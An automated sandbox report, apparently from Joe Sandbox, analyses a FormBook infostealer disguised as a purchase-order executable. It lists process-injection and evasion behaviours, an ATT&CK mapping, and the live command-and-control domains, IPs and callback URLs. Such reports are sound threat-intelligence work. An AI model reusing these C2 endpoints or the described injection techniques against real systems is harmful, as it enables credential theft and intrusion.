          Source: C:\Users\user\Desktop\PO 367628usa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO 367628usa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO 367628usa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO 367628usa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO 367628usa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1Input Capture1Security Software Discovery321Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 412247 Sample: PO 367628usa.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 38 www.sherwooddaydesigns.com 2->38 40 www.shadyshainarae.com 2->40 42 2 other IPs or domains 2->42 52 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 11 other signatures 2->58 11 PO 367628usa.exe 3 2->11         started        signatures3 process4 file5 36 C:\Users\user\...\PO 367628usa.exe.log, ASCII 11->36 dropped 62 Injects a PE file into a foreign processes 11->62 15 PO 367628usa.exe 11->15         started        18 PO 367628usa.exe 11->18         started        20 PO 367628usa.exe 11->20         started        22 PO 367628usa.exe 11->22         started        signatures6 process7 signatures8 70 Modifies the context of a thread in another process (thread injection) 15->70 72 Maps a DLL or memory area into another process 15->72 74 Sample uses process hollowing technique 15->74 76 Queues an APC in another process (thread injection) 15->76 24 explorer.exe 15->24 injected process9 dnsIp10 44 www.patricksparber.com 156.253.106.229, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 24->44 46 servantsheartvalet.com 209.182.202.96, 49744, 80 IMH-WESTUS United States 24->46 48 8 other IPs or domains 24->48 60 System process connects to network (likely due to code injection or exploit) 24->60 28 raserver.exe 12 24->28         started        signatures11 process12 dnsIp13 50 www.patricksparber.com 28->50 64 Modifies the context of a thread in another process (thread injection) 28->64 66 Maps a DLL or memory area into another process 28->66 68 Tries to detect virtualization through RDTSC time measurements 28->68 32 cmd.exe 1 28->32         started        signatures14 process15 process16 34 conhost.exe 32->34         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO 367628usa.exe36%VirustotalBrowse
          PO 367628usa.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.PO 367628usa.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.PO 367628usa.exe.4b0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          servantsheartvalet.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.bridgestreetresources.com/meub/?5jYHTPD=wcKMzz9mAcCi2aLb0t1qtV86GlMNvZH+VyhKA1jT/I4bq+nb0/na/dj3wGs+8qrOUrJA87J5aQ==&W2MTZ=5jyDHn6x2rY0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.m-kenterprises.com/meub/?5jYHTPD=AHOwzMgiYatzzgqEm8fFrRw5FyeBXJPWAn72SIj91D3zxHtkj2kvoxgZPNykIH4K/OrW/jgvcw==&W2MTZ=5jyDHn6x2rY0%Avira URL Cloudsafe
          http://servermanager.miixit.org/index_ru.htmlc0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.servantsheartvalet.com/meub/?5jYHTPD=WGLirrwFUtYpDXzpLjvBuZZEIXcS0L/7kvp4uO4ypDpemvycQ/ZH3e36klWLP588DVSUgz18wg==&W2MTZ=5jyDHn6x2rY0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://checkip.dyndns.org/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://servermanager.miixit.org/index_ru.html0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://servermanager.miixit.org/report/reporter_index.php?name=0%Avira URL Cloudsafe
          http://servermanager.miixit.org/10%Avira URL Cloudsafe
          www.uuoouu-90.store/meub/0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.patricksparber.com/meub/?5jYHTPD=q/3go0TMrjOOicJ8yyeZoSSUK4YYViZWgar0VOI0LAyS1IHPJrhhqQPM0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://servermanager.miixit.org/downloads/0%Avira URL Cloudsafe
          http://servermanager.miixit.org/hits/hit_index.php?k=0%Avira URL Cloudsafe
          http://www.shadyshainarae.com/meub/?5jYHTPD=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSjw9+1sG86DK55WYOQ==&W2MTZ=5jyDHn6x2rY0%Avira URL Cloudsafe
          http://www.patricksparber.com/0%Avira URL Cloudsafe
          http://www.patricksparber.com/K0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          servantsheartvalet.com
          209.182.202.96
          truetrueunknown
          www.patricksparber.com
          156.253.106.229
          truetrue
            unknown
            bridgestreetresources.com
            66.235.200.147
            truetrue
              unknown
              m-kenterprises.com
              34.102.136.180
              truefalse
                unknown
                shadyshainarae.com
                34.102.136.180
                truefalse
                  unknown
                  ext-sq.squarespace.com
                  198.185.159.144
                  truefalse
                    high
                    www.bridgestreetresources.com
                    unknown
                    unknowntrue
                      unknown
                      www.uuoouu-90.store
                      unknown
                      unknowntrue
                        unknown
                        www.shadyshainarae.com
                        unknown
                        unknowntrue
                          unknown
                          www.sherwooddaydesigns.com
                          unknown
                          unknowntrue
                            unknown
                            www.servantsheartvalet.com
                            unknown
                            unknowntrue
                              unknown
                              www.meucamarimoficial.com
                              unknown
                              unknowntrue
                                unknown
                                www.m-kenterprises.com
                                unknown
                                unknowntrue
                                  unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.bridgestreetresources.com/meub/?5jYHTPD=wcKMzz9mAcCi2aLb0t1qtV86GlMNvZH+VyhKA1jT/I4bq+nb0/na/dj3wGs+8qrOUrJA87J5aQ==&W2MTZ=5jyDHn6x2rYtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.m-kenterprises.com/meub/?5jYHTPD=AHOwzMgiYatzzgqEm8fFrRw5FyeBXJPWAn72SIj91D3zxHtkj2kvoxgZPNykIH4K/OrW/jgvcw==&W2MTZ=5jyDHn6x2rYfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.servantsheartvalet.com/meub/?5jYHTPD=WGLirrwFUtYpDXzpLjvBuZZEIXcS0L/7kvp4uO4ypDpemvycQ/ZH3e36klWLP588DVSUgz18wg==&W2MTZ=5jyDHn6x2rYtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  www.uuoouu-90.store/meub/true
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.shadyshainarae.com/meub/?5jYHTPD=IF6wwdQ2GC/v5+zeo737nU5N5nLUvdsVBqkfZ3TmK32/J3TLHA8Ym95CSjw9+1sG86DK55WYOQ==&W2MTZ=5jyDHn6x2rYfalse
                                  • Avira URL Cloud: safe
                                  unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000002.589360759.000000000095C000.00000004.00000020.sdmpfalse
                                    high
                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.comexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designersGexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designers/?explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers?explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                              high
                                              http://servermanager.miixit.org/index_ru.htmlcPO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.tiro.comexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designersexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.goodfont.co.krexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssPO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.carterandcone.comlexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.sajatypeworks.comexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.typography.netDexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://fontfabrik.comexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.founder.com.cn/cnexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.org/PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPCPO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://servermanager.miixit.org/index_ru.htmlPO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://servermanager.miixit.org/report/reporter_index.php?name=PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers8explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://servermanager.miixit.org/1PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.fonts.comexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.sandoll.co.krexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.patricksparber.com/meub/?5jYHTPD=q/3go0TMrjOOicJ8yyeZoSSUK4YYViZWgar0VOI0LAyS1IHPJrhhqQPMraserver.exe, 00000009.00000002.589940302.0000000002F43000.00000004.00000020.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.urwpp.deDPleaseexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.zhongyicts.com.cnexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO 367628usa.exe, 00000000.00000002.346748080.0000000002EB0000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.sakkal.comexplorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC5http://servermanaPO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://servermanager.miixit.org/downloads/PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://servermanager.miixit.org/hits/hit_index.php?k=PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.patricksparber.com/raserver.exe, 00000009.00000002.589924154.0000000002F3C000.00000004.00000020.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.patricksparber.com/Kraserver.exe, 00000009.00000002.589924154.0000000002F3C000.00000004.00000020.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                156.253.106.229
                                                                www.patricksparber.comSeychelles
                                                                136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                34.102.136.180
                                                                m-kenterprises.comUnited States
                                                                15169GOOGLEUSfalse
                                                                209.182.202.96
                                                                servantsheartvalet.comUnited States
                                                                22611IMH-WESTUStrue
                                                                66.235.200.147
                                                                bridgestreetresources.comUnited States
                                                                13335CLOUDFLARENETUStrue

                                                                General Information

                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                Analysis ID:412247
                                                                Start date:12.05.2021
                                                                Start time:14:42:17
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 12m 21s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:light
                                                                Sample file name:PO 367628usa.exe
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:25
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@13/1@9/4
                                                                EGA Information:Failed
                                                                HDC Information:
                                                                • Successful, ratio: 11.3% (good quality ratio 9.6%)
                                                                • Quality average: 67.7%
                                                                • Quality standard deviation: 34.2%
                                                                HCA Information:
                                                                • Successful, ratio: 95%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Found application associated with file extension: .exe
                                                                Warnings:
                                                                Show All
                                                                • Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.147.198.201, 104.43.139.144, 20.82.210.154, 40.88.32.150, 92.122.213.194, 92.122.213.247, 52.155.217.156, 2.20.143.16, 2.20.142.209, 20.54.26.129, 184.30.20.56
                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                14:43:12API Interceptor1x Sleep call for process: PO 367628usa.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                209.182.202.96PO9448882.exeGet hashmaliciousBrowse
                                                                • www.servantsheartvalet.com/meub/?8p64Z2=V6A8xrZp&y8y=WGLirrwFUtYpDXzpLjvBuZZEIXcS0L/7kvp4uO4ypDpemvycQ/ZH3e36km6bTIgHEg7F
                                                                66.235.200.147da.exeGet hashmaliciousBrowse
                                                                • www.burundiacademyst.com/8u3b/?dZ8=BT0h&hDKxoPS=4vEXK17IA394WC8iTvIivdS0Cql5iuvV57KnzC84MNlFoWTpUG2RsyvHd875puybb7chYZMxxA==
                                                                Payment.xlsxGet hashmaliciousBrowse
                                                                • www.burundiacademyst.com/8u3b/?zh=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg==&BL3=jFNt_dFXS
                                                                Quotation.exeGet hashmaliciousBrowse
                                                                • www.thesocialgreen.com/mgl/?5j8l=f1uD85eB+cCOn8+C4qvYEhi6iPiStfCl1+N32n42aL6OkNxrdvNbFuLtanM9fSU4CP6/6paE8g==&lnxdA=fTvdzZsH3tODubI
                                                                Payment.xlsxGet hashmaliciousBrowse
                                                                • www.burundiacademyst.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg==
                                                                MSUtbPjUGib2dvd.exeGet hashmaliciousBrowse
                                                                • www.thesilverslipper.club/ffy/?2d0=lnxdA&-Z1hnrG=VsEd2ljFwB2w0+9z72Htc0M/tkPafkZssJ8rij5TQB/jOTqdHRQwIgCh7XOuaEky5D7/
                                                                PO20210429.xlsxGet hashmaliciousBrowse
                                                                • www.burundiacademyst.com/8u3b/?Mz=ltx0qfi0x45&WBZXQ8j=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg==
                                                                INV+PACKING LIST.exeGet hashmaliciousBrowse
                                                                • www.ponderingelephant.com/ple/?-ZsPdp=xnHXGBz4ypimZ5Y5kb5MaQgvqj3YDL1ZdP3vyaOARIvLjHnyTXBiVpDLKEMSLW5u89hw&alX=TXFxmnkp-thT
                                                                NMpDBwHJP8.exeGet hashmaliciousBrowse
                                                                • www.bigplatesmallwallet.com/p2io/?Jv4=O674xtRz5BQXEtA9kGCKbVIXJyLg/Uv1kEh0zcEQqY6nJSttJx1/IGytgU6ULEG2tFa9QVoShQ==&NvTHEh=QR-x_26P2h
                                                                2021-03-31.exeGet hashmaliciousBrowse
                                                                • www.look-production.com/g7b/?mBZ=sMEGTBL7b0Crz/M/9MY8kI3QE8u69YIEpY8MG7KdvZs7JG2S3J70OJI9COEBjTNWNkCc&pPN=OvNDOt
                                                                1LHKlbcoW3.exeGet hashmaliciousBrowse
